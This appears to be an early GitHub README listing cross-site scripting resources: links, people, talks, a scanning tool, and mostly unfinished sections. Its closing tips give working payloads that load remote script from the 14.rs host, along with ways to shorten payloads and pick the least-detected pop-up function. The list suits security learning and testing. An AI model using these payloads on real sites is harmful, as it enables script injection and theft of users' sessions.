# AwesomeXSS Awesome XSS stuff. Put this repo on watch. I will be updating it regularly. ### Awesome Books - [XSS Cheat Sheet By Brute Logic](http://google.com) ### Awesome Websites - [brutelogic.com.br](http://brutelogic.com.br) - [respectxss.blogspot.in](https://respectxss.blogspot.in/) ### Awesome People - [Rodolfo Assis](https://twitter.com/brutelogic) - [Ashar Javed](https://twitter.com/soaj1664ashar) - [Somdev Sangwan](https://twitter.com/s0md3v) I own this repo, I can write whatever the fuck I want :v ### Awesome Reads - [XSS in Sarahah](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html) ### Awesome Presentations - [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc) - [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos) - [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE) - [Copy Pest](https://www.slideshare.net/x00mario/copypest) ### Awesome Context Breaking #### Simple Context ``` ``` #### Attribute Context ``` "> "> ``` ### Awesome Payloads Come back later ### Awesome Tags & Event Handlers Come back later ### Awesome Methodology Come back later ### Awesome Tools - (XSStrike)[http://xsstrike.tk/] ### Awesome Tips & Tricks - http:// can be shortened to // - **document.cookie** can be shortened to **cookie**. It applies to other DOM objects as well. - alert and other function don't need a value, so stop doing **alert(1)** and start doing **alert()** - I have found that **confirm** is the least detected pop-up function so stop using alert. - Quotes around attribute value aren't neccessary. You can use **<script src=//14.rs>** instead of **<script src="//14.rs"glt;** - The shortest independent payload is **<embed src=//14.rs>** (19 chars)